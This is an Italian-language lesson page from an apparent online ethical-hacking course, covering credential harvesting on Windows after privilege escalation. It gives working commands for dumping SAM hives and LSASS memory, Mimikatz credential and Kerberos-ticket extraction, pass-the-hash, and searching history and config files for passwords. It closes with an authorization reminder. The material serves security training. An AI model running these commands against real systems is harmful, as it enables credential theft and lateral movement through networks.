0Pricing
Ethical Hacking Academy · Lezione

Raccolta delle credenziali

Estrarre i segreti

Raccolta delle credenziali è una lezione Ethical Hacking Academy gratuita su CoddyKit. Questa è la lezione 4 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Ethical Hacking Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Ethical Hacking Academy include 4 lezioni in totale.

Perché raccogliere le credenziali?

Anche dopo aver raggiunto SYSTEM, il vero obiettivo sono spesso le credenziali — hash delle password, password in chiaro e ticket che consentono di spostarsi lateralmente e raggiungere il dominio. La raccolta delle credenziali trasforma una singola macchina nell'intera rete.

Il database SAM

Gli hash degli account locali risiedono nell'hive del Registro di sistema SAM, crittografato con una chiave contenuta nell'hive SYSTEM. Con l'accesso SYSTEM è possibile eseguire il dump di entrambi ed estrarre offline gli hash NTLM.

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# then: secretsdump.py -sam sam.save -system system.save LOCAL

Memoria di LSASS

Il processo LSASS conserva in memoria le credenziali degli utenti con sessioni attive — spesso includendo password in chiaro o hash NTLM riutilizzabili e ticket Kerberos. Eseguire il dump di LSASS è l'azione di raccolta con il valore più elevato.

rundll32 comsvcs.dll, MiniDump <lsass_pid> C:\Temp\lsass.dmp full

Mimikatz

Mimikatz è lo strumento per eccellenza per l'estrazione delle credenziali. sekurlsa::logonpasswords recupera le credenziali da LSASS; può inoltre estrarre ticket, eseguire attacchi pass-the-hash ed effettuare il dump di SAM.

privilege::debug
sekurlsa::logonpasswords
lsadump::sam

Pass-the-Hash

Spesso non è necessario decifrare un hash — pass-the-hash esegue l'autenticazione utilizzando direttamente l'hash NTLM. Per questo è sufficiente eseguire il dump degli hash per spostarsi lateralmente tra macchine che condividono le credenziali di amministratore locale.

pth-winexe -U "admin%aad3b...:31d6c..." //10.0.0.6 cmd
# or evil-winrm -i host -u admin -H <NThash>

Credenziali di dominio memorizzate nella cache

Le macchine unite a un dominio memorizzano nella cache gli ultimi accessi (MSCache/DCC2), così gli utenti possono accedere offline. Questi hash memorizzati nella cache possono essere estratti e decifrati offline (lentamente), permettendo di ottenere le password di dominio.

secretsdump.py -system system.save -security security.save LOCAL

Credenziali salvate e memorizzate

Windows memorizza le credenziali nel Credential Manager / Vault e in blob protetti da DPAPI (credenziali RDP salvate, password dei browser e delle reti Wi-Fi). Con SYSTEM e le chiavi master è possibile decrittografare questi dati.

cmdkey /list
vaultcmd /listcreds
mimikatz: dpapi::cred /in:<blob>

Furto dei ticket Kerberos

In Active Directory, sekurlsa::tickets di Mimikatz esporta i TGT/TGS Kerberos. I ticket sottratti consentono il pass-the-ticket, mentre un TGT di un amministratore di dominio può portare alla persistenza tramite Golden/Silver Ticket.

sekurlsa::tickets /export

File e script contenenti segreti

Non trascuri le opportunità più semplici: script, file di configurazione e cronologie piene di credenziali in chiaro. La cronologia di PowerShell, i file di installazione automatica e le stringhe di connessione di IIS web.config contengono spesso password.

type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
findstr /si "password connectionString" *.config

Pulizia e OPSEC

Il dump di LSASS è attentamente monitorato dagli EDR e Defender Credential Guard può bloccarlo. Durante gli incarichi, preferisca metodi discreti, elimini i file di dump e documenti nel report ciò a cui ha avuto accesso.

Etica e autorizzazione

La raccolta delle credenziali espone i segreti più sensibili dell'organizzazione. Gestisca in modo sicuro le credenziali estratte, non le esfiltri mai oltre l'ambito autorizzato e operi esclusivamente sulla base di un'autorizzazione scritta esplicita.

Verifica rapida

Verifichi le Sue conoscenze sulla raccolta delle credenziali.

Riepilogo

Ha imparato a conoscere la raccolta delle credenziali:

  • esegua il dump di SAM per gli hash locali; esegua il dump di LSASS per ottenere utenti con sessioni attive e ticket
  • Mimikatz estrae password, hash e ticket Kerberos
  • Pass-the-hash / pass-the-ticket consentono lo spostamento laterale senza dover decifrare gli hash
  • controlli Credential Manager, DPAPI e i file di configurazione e cronologia alla ricerca di segreti

Con questo si conclude il corso sull'escalation dei privilegi in Windows.

Domande Frequenti

La lezione «Raccolta delle credenziali» è gratuita?

Sì — il testo completo di «Raccolta delle credenziali» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Ethical Hacking Academy, passa a CoddyKit PRO. Il corso Ethical Hacking Academy include 4 lezioni in totale.

Cosa imparerò in «Raccolta delle credenziali»?

Estrarre i segreti Eserciti Ethical Hacking Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.

Ho bisogno di esperienza per iniziare Ethical Hacking Academy?

Non è richiesta alcuna esperienza precedente. Ethical Hacking Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 4 di 4.

Quanto tempo richiede la lezione «Raccolta delle credenziali»?

La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.

Posso scrivere ed eseguire codice in questa lezione Ethical Hacking Academy?

Sì. Ogni lezione Ethical Hacking Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.

Tutte le lezioni di questo corso

  1. Enumerazione di Windows
  2. Configurazioni errate dei servizi
  3. Impersonificazione dei token
  4. Raccolta delle credenziali
← Torna a Ethical Hacking Academy